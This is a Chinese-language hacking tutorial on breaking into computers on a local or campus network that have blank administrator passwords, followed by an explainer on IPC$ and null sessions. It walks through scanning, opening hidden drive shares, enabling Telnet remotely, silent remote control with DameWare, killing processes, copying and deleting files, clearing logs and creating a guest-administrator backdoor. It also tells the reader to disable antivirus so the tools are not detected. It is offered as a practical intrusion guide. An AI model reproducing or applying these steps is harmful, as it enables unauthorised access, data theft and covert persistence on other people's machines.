如何入侵局域网电脑.doc

如何入侵局域网电脑如何入侵局域网电脑如何入侵局域网电脑.txt如何入侵局域网电脑 1.入侵的范围只包括局域网，如果在学校上，可以入侵整个校园网；2.能入侵的只是存在弱口令(用户名为 administrator 等,密码为空)，并且开了 139 端口，但没开防火墙的机子 入侵工具： 一般要用到三个：NTscan 变态扫描器，Recton--D 贺免杀专用版，DameWare 迷你中文版 4.5. （前两个工具杀毒软件都会报毒，建议将杀毒软件实时防毒暂时关掉，并将这两个软件的压缩包加密，防止被杀 ） 入侵步骤： 1.使用“NTscan 变态扫描器“，在 IP 处填上要扫描的 IP 范围，选择“WMI 扫描“方式，按“开始“后就等扫描结果了 2.使用“Recton--D 贺免杀专用版“ 选择“CMD 命令“项，在“CMD:“中输入“net share C$=C:\“，即可开启远程主机的 C 盘共享，以此将“C“换成 D,E,F 等，即可开启 D盘，E 盘，F 盘等的共享，这种共享方式隐蔽性很高，而且是完全共享，在对方主机上不会出现一只手托住盘的共享标志，然后在地址栏中输入“\\对方 IP\C$“，即可进入对方 C 盘。

选择“Telnet“项，在“远程主机“中输入刚才扫描到的一个 IP，远程启动 Telnet 服务，成功后在“CMD 选项“中，执行命令：“net share ipc$“,接着执行：“net share admin$“,最后执行“net use [url=file://\\***.***.***.***\IPC$]\\***.***.***.***\IPC$[/url] ““ /user：administrator“在*处填入你入侵的主机 IP 3.使用“DameWare 迷你中文版 4.5“，安装后点“DameWare Mini Remote Control“，在“帮助“项中选择激活产品，输入注册信息，成功注册后，进入“远程连接“窗口，在“主机“处填入 IP 地址，点“设置“，在“服务安装选项“中点“编辑“后,在“通知对话框“中去掉“连接时通知“,在“附加设置“中全都不选，在“用户选项“中去掉“启用用户选项菜单“设置完成好后，就可点“连接“，在弹出的对话框中点“确定“后，成功后你就可以像操作自己机子一样控制别人电脑了，当然你也可以只选择监视对方屏幕 注意：如果不注册的话，在对方主机上会弹出一个对话框，暴露你的身份。

入侵步骤补充： 1.在以上第 2 步中，远程启动 Telnet 服务可以通过“我的电脑-管理-连接到另一台计算机-输入 IP-服务和应用程序-服务-将telnet 改为手动-启动“完成 2.Recton--D 贺免杀专用版还有其他功能，在“进程“项中，可以查看远程主机的进程，并可任意结束其中进程；在“共享“项中，可以创建共享，我常用的是创建 C$,D$,E$,F$,共享路径分别对应C：\,D：\等，共享好后在地址栏中输入“[url=file://\\IP\C$]\\IP\C$[/url]“,进入对方 C 盘，你就可以随意复制删除里面的东西了，而且这种共享对方机子盘符上不会显示共享图标，也就不会被发现，弄完后最好还是把共享给关掉最后选“日志“，清除所有日志，不留痕迹这个软件会被杀毒软件当作病毒杀掉，用它时须将实时防毒关掉 3.上面的共享可通过 CMD(程序-附件-命令提示符)完成，首先“telnet IP“,telnet 上去,键入 y 后输入的用户名“administrator“,密码为空, 进入后，开共享用 net share 命令，共享 C$(即 C 盘)：“net share C$=C：“,共享 system 文件夹：“net share c=c：\winnt\system32“,共享 IPC$用：“net share IPC$“等,最后是关闭共享，关闭 C 盘共享：“net share C$ /del“。

4.为方便下次入侵，可以设置后门， 查看用户：“net user“,激活 guest 用户 “net user guest /active：yes“,更改 guest 的密码为 poco：“net user guest poco“,把 guest 的权限提升为管理员权限：“net localgroup administrators guest /add“ 5.telnet 命令(DOS 命令)很多，可去网上查找它的命令，常用的有：查看 D 盘文件：““dir d：\“,查看 C 盘 program file 文件夹：“dir c：\PROGRA~1\;“,60 秒倒记时关机：“shutdown -s -t 60“ 补充说明： use 错误原因解决： (1).“发生系统错误 1326 登录失败： 未知的用户名或错误密码 在远程机的“控制面板-文件夹选项-查看-简单的文件共享“,去掉选取,然后再尝试连接简单文件共享会把网络连接权限都归为 guest连接，是无法访问 C$等管理共享的. (2)“发生系统错误 1327 登陆失败：用户帐户限制可能的原因包括不允许空密码，登陆时间限制，或强制的策略限。

在远程机的“控制面板－管理工具－本地安全策略－安全选项－用户权限“指派里，禁用“空密码用户只能进行控制台登陆“. (3)“//IP/c$“时提示找不到网络途径在“网络和拨号连接“中“本地连接“中选取“Internet 协议(TCP/IP)“属性，进入“高级 TCP/IP 设置“选“WINS 设置“里面有一项“启用 TCP/IP 的 NETBIOS 关于 ipc注意：本文所讨论的各种情况均默认发生在 win NT/2000 环境下，win98 将不在此次讨论之列 二 什么是 ipc$ IPC$(Internet Process Connection)是共享“命名管道“的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问IPC$是 NT/2000 的一项新功能，它有一个特点，即在同一时间内，两个 IP 之间只允许建立一个连接NT/2000 在提供了 ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt 或 windows(admin$)共享。

所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低 平时我们总能听到有人在说 ipc$漏洞，ipc$漏洞，其实 ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个‘后门’：空会话（Null session） 那么什么是空会话呢？ 三 什么是空会话 在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的 在 Windows NT 4.0 中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下： 1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建 立； 2）服务器产生一个随机的 64 位数（实现挑战）传送回客户； 3）客户取得这个由服务器产生的 64 位数，用试图建立会话的帐号的口令打乱它，将结 果返回到服务器（实现响应） ； 4）服务器接受响应后发送给本地安全验证（LSA） ，LSA 通过使用该用户正确的口令来核实响应以便确认请求者身份如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。

当对挑战的响应核实为正确后，一个访问令牌产生，然后传送给客户客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止 以上是一个安全会话建立的大致过程，那么空会话又如何呢？ 空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码） ，但根据 WIN2000 的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符 SID（它标识了用户和所属组） ，对于一个空会话，LSA 提供的令牌的 SID 是 S-1-5-7，这就是空会话的 SID，用户名是：ANONYMOUS LOGON（这个用户名是可以在用户列表中看到的，但是是不能在 SAM数据库中找到，属于系统内置的帐号） ，这个访问令牌包含下面伪装的组： Everyone Network 在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息那么建立空会话到底可以作什么呢？ 四 空会话可以做什么 对于 NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问 everyone 权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对 2000 作用更小，因为在 Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。

从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的 ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的，成功的导出用户列表大大增加了猜解的成功率，仅从这一点，足以说明空会话所带来的安全隐患，因此说空会话毫无用处的说法是不正确的以下是空会话中能够使用的一些具体命令： 1 首先，我们先建立一个空连接（当然，这需要目标开放 ipc$） 命令：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] ““ /user:““ 注意：上面的命令包括四个空格，net 与 use 中间有一个空格，use后面一个，密码左右各一个空格 2 查看远程主机的共享资源 命令：net view [url=file://\\ip]\\ip[/url] 解释：前提是建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下面的结果，但此命令不能显示默认共享 在 \\*.*.*.*的共享资源 资源共享名 类型 用途 注释 ----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。

3 查看远程主机的当前时间 命令： net time [url=file://\\ip]\\ip[/url] 解释：用此命令可以得到一个远程主机的当前时间 4 得到远程主机的 NetBIOS 用户名列表（需要打开自己的 NBT） 命令：nbtstat -A ip 用此命令可以得到一个远程主机的 NetBIOS 用户名列表，返回如下结果： Node IpAddress: [*.*.*.*] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- SERVER UNIQUE Registered OYAMANISHI-H GROUP Registered OYAMANISHI-H GROUP Registered SERVER UNIQUE Registered OYAMANISHI-H UNIQUE Registered OYAMANISHI-H GROUP Registered SERVER UNIQUE Registered OYAMANISHI-H UNIQUE Registered ..__MSBROWS。